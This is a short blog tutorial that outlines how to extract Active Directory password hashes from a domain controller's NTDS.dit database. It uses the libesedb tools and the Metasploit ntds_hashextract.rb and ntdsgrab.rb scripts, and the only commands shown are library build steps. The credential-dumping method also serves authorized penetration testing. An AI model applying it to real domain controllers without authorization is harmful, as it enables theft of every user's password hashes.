How To Hack: Dumping Domain Password Hashes Using Metasploit (ntds_hashextract.rb)

password-crackingThe ntds_hashextract.rb script is a standalone tool that can be used to quickly and efficiently extract Active Directory user account password hashes from the exported datatable of an NTDS.dit database. As it turns out, exporting the datatable can sometimes be tricky so here is a detailed tutorial covering the methodology that I use and continue to have success with.

Step 1 – Install Libesedb

Libesedb is an open source C library developed to forensically extract information from Extensible Storage Engine (ESE) database files. In order to get what we need out of NTDS.dit we will first have to download and install the library using the following URL

http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

 

Next we will need to extract the tarball, configure, make and install the library using the command line.

$tar xvzf libesedb-alpha-20120102.tar.gz

$cd libesedb-20120102

$./configure

$make && make install

This is what the finished output looked like for me after everything was done on a fresh copy of Backtrack 5.

 

Step 2 – Export Tables From NTDS.dit

Now that you have a working install of the Libesedb library make sure you’ve got a proper copy of the NTDS.dit database as well as the SYSTEM registry hive file on your machine. In case you weren’t already aware, you can use another module, ntdsgrab.rb to obtain these items from a Windows Domain Controller, provided you have proper credentials of course. Here is what they look like on my system after downloading them via the Metasploit Framework.

 

Change into whatever directory contains your loot, in my case the /tmp/NTDS_Grab directory and run esedbexport from the libesedb/esedbtools directory against your NTDS.dit database. It will export all of the tables and store them in a newly created directory called ntds.export.

 

Step 3 – Dump All The Hashes

At this point you’re ready to run ntds_hashextract.rb against the datatable (Table #4) and the SYSTEM registry hive file in order to grab all of the domain password hashes. If the domain is large enough (several thousand unique users) the command might take a few minutes to finish on your system so go grab a cup of coffee. When it’s done it should look something like this.

 

That’s all for now, check back soon for more in this series.

Thanks for reading.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *